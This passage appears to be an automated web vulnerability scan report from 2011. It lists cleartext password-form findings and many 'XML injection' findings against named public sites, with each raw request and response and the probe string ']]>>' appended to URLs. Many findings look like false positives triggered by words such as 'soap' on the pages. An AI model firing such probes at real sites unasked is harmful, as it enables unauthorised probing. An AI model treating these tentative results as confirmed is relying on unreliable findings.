Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
</strong>
               <form id="frm_login" method="post" action="/">
                   <input type="text" class="text" name="login_email" id="login_email" />
                   <input type="password" class="text" name="login_password" id="login_password" />
                   <a href="/user/reset">
...[SNIP]...

9.2. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...

9.3. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
               <form id="loginForm" name="loginForm" method="post" action="/registration/loginAjax.jhtml">
                   <div class="login-email">
...[SNIP]...
<input type="text" name="" class="password-text form-input urchin" data-urchin="login_modal/password" id="modal-password-text" value="Password" />
                   <input type="password" name="loginPassword" class="password form-input" id="modal-password" value="" />
                   
                   </div>
...[SNIP]...

9.4. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
</div>
       <form name="changePassword" id="changePassword" action="/registration/ajaxEditPssAccount.jhtml" method="post">
           <input type="hidden" id="userName" name="account.userName" value="" />
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="oldPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="newPassword" value="" />
           </div>
...[SNIP]...
</label>
               <input class="inp-text" type="password" name="confirmPassword" value="" />
           </div>
...[SNIP]...

10. XML injection
There are 27 instances of this issue:


10.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico]]&gt;&gt;
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2F3F04A9524AEAD45E0DCD5CDF0568C6.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:35 GMT
Content-Length: 41730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
316&random=0.3651618334396466&sId=ZIEAriQOlNCqNZCa';

var aj = new AjaxHelper();
aj.sendGetXMLRequest(
progressBarUrl,
function(respXML){
var el =respXML.getElementsByTagName("status")[0];
var active = el.getAttribute("active");
if (active=="true"){
var totalContentLengthKbytes = el.getAttribute("totalContentLengthK
...[SNIP]...

10.2. http://www.altervista.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.altervista.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.altervista.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:00 GMT
Server: Apache
Content-Type: text/html
Content-Length: 2937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="cref" value="http://tb.altervista.org/cgi-bin/cse_xml.pl/C/www/en" />
...[SNIP]...

10.3. http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bathandbodyworks.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bathandbodyworks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:05:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=jTy3NXtGltsQzsbmrvGd8KLppvJ2StHsdSwgvLTfny1MLvb1V1Gr!388152377; path=/
Set-Cookie: browser_id=123856780554; expires=Tuesday, 30-Mar-2021 14:05:58 GMT; path=/
Set-Cookie: browser_id=123856780554; expires=Tuesday, 30-Mar-2021 14:05:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 112794


<!DOCTYPE html>
<html>
<head>


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Chec
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-css.xml -->
<link href="http://bbw.imageg.net/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...

10.4. http://www.bizrate.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bizrate.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizrate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: trafficSourceDebugParam=""; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: CP="NON DSP ADM DEV PSD TAI OUR IND STP PRE NAV UNI"
Set-Cookie: yes_email_invite=invite3; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: sessionid=120412346400107153; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Set-Cookie: br=13017483531990811351002040102023819; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:45:53 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1301748353%3Btimestamp%3D1301748353%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dwlk%3Bsearch_cid%3D12060300; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Set-Cookie: userzip=0; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:45:53 GMT; Path=/
Set-Cookie: p13n_id=000138125b70d4f44e478d5fd6073ea5ed27; Domain=.bizrate.com; Expires=Tue, 30-Mar-2021 12:45:53 GMT; Path=/
Set-Cookie: rng=6967172; Domain=.bizrate.com; Expires=Sun, 03-Apr-2011 12:45:53 GMT; Path=/
Set-Cookie: sosurvey_response=none%3A%3Afalse%3A%3Afalse%3A%3Ahttp%3A%2F%2Fevalus.bizrate.com%2Fwix%2Fp1648730.aspx%3Fbr%3D13017483531990811351002040102023819%26session_id%3D120412346400107153%26rf_code%3Dwlk%26brand%3DBR%26country_code%3DUS%26pageToken%3D8B%26keyword%3Dfalcon%2Bicon; Domain=.bizrate.com; Expires=Mon, 02-May-2011 12:45:53 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 12:45:52 GMT
Content-Length: 289099

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

10.5. http://www.bravotv.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.bravotv.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bravotv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 1648302699
Content-Type: text/html; charset=utf-8
X-Drupal-Cache: MISS
Varnish-X-Cache: MISS
ETag: "1301751644-0"
X-PF-Uncompressing: 1
Last-Modified: Sat, 02 Apr 2011 13:40:44 +0000
X-Powered-By: PHP/5.2.8
Content-Length: 26499
Cache-Control: max-age=278
Date: Sat, 02 Apr 2011 13:40:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<a href="/sitemap.xml" title="">XML Map</a>
...[SNIP]...

10.6. http://www.columbia.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.columbia.edu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.columbia.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:17:14 GMT
Server: Apache/2.2.17
Vary: accept-language,accept-charset,Accept-Encoding,User-Agent
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1028

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

10.7. http://www.consumersearch.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.consumersearch.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.consumersearch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.6
X-Drupal-Cache: MISS
Last-Modified: Sat, 02 Apr 2011 13:36:26 +0000
ETag: "1301751386-1"
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=1799
Expires: Sat, 02 Apr 2011 14:06:28 GMT
Date: Sat, 02 Apr 2011 13:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
version="XHTML+RDFa 1.0"
xmlns:xsd="http://www.w3.org/2001/XMLSchema#"
xmlns:addthis="http://www.addthis.com/help/api-spec"
xmlns:fb="http://www.facebook.com/2008/fbml"
xml:lang="en"
lang="en">
...[SNIP]...

10.8. http://www.dickssportinggoods.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.dickssportinggoods.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dickssportinggoods.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=WTxZNXlJHncfsfnrTYqCZQ5bqJFGT8M514yz2YJ1h59y0TkjvYtJ!433893400; path=/
Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/
Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/
Set-Cookie: browser_id=123853471724; expires=Tuesday, 30-Mar-2021 13:34:12 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 46106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZone
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-head-css.xml -->
<link href="http://DSP.imageg.net/min-cat/site-head-css.xml.min.css" type="text/css" rel="stylesheet" />
...[SNIP]...

10.9. http://www.diynetwork.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.diynetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diynetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:03:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100994


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
   <title>DIY 404 Error Page : About Us : DIY Network</title>
   <meta name="description" conten
...[SNIP]...
<!--Endeca request http://searchservices.scrippsnetworks.com/diy/service/mostPopular/mostPopular.xsl/noContentType-0-noContentType-0-10-0.xml -->
...[SNIP]...

10.10. http://www.ehow.co.uk/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 14:00:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:00:49 GMT
Content-Length: 27060
Connection: close


<!DOCTYPE html>
<!--[if IE]><![endif]-->
<html class="Corporate" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
   <head>
               <meta charset="utf-8" />

...[SNIP]...
<a href="http://www.ehow.co.uk/how_5896459_use-sugar-soap-cleaning.html" class="title">How to Use Sugar Soap for Cleaning                
                   </a>
...[SNIP]...

10.11. http://www.examiner.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.examiner.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.examiner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 12:45:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 12:45:23 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1301748323"
Set-Cookie: EXAMINEREDITION=921; expires=Tue, 30-Mar-2021 12:45:23 GMT; path=/; domain=.examiner.com
X-Generator: Drupal 7 (http://drupal.org)
X-WebNode: web8.b.examiner.com
Vary: Accept-Encoding
Content-Length: 57361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" version="XHTML+RDFa 1.0" dir="ltr"

...[SNIP]...
.w3.org/2000/01/rdf-schema#"
xmlns:sioc="http://rdfs.org/sioc/ns#"
xmlns:sioct="http://rdfs.org/sioc/types#"
xmlns:skos="http://www.w3.org/2004/02/skos/core#"
xmlns:xsd="http://www.w3.org/2001/XMLSchema#"
xmlns:v="http://rdf.data-vocabulary.org/#">
...[SNIP]...

10.12. http://www.foodnetwork.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.foodnetwork.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:24:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80624


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>


<head>
   <title>404 Error Page : ABOUT US : Food Network</title>
   <meta name="description" conten
...[SNIP]...
<!--Endeca request http://searchServices.scrippsnetworks.com/food/service/dinnerTonight/dinnerTonight.xsl/dinnerTonight-5,0.xml -->
...[SNIP]...

10.13. http://www.hollywoodlife.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hollywoodlife.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodlife.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Last-Modified: Sat, 02 Apr 2011 13:54:54 GMT
Pragma: no-cache
Server: nginx/0.7.62
X-Pingback: http://www.hollywoodlife.com/xmlrpc.php
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Cache-Control: no-cache, must-revalidate
Expires: Sat, 02 Apr 2011 13:54:55 GMT
Date: Sat, 02 Apr 2011 13:54:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   
...[SNIP]...
<a href="http://feedproxy.google.com/~r/insidetvblog/~3/KwyIIdus1_I/" target="_blank">Soap Round-Up: 'B&Bs' Ridge Chooses Brooke and More</a>
...[SNIP]...

10.14. http://www.house.gov/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.house.gov
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.house.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: USHR Webserver Ver 5.4.1
Content-Type: text/html
Content-Length: 13462
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:34:45 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...

10.15. http://www.k12.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.k12.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.k12.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 01 Apr 2011 15:55:02 GMT
ETag: "4176-49fdd6ec78180"
Accept-Ranges: bytes
Content-Length: 16758
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
pics-label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 c 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0) "http://www.icra.org/ratingsv02.html" l r (nz 1 vz 1 lz 1 oz 1 cz 1) "http://www.rsac.org/ratingsv01.html" l r(n 0 s 0 v 0 l 0))
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:tal="http://xml.zope.org/namespaces/tal">
...[SNIP]...

10.16. http://www.kazaa.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kazaa.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

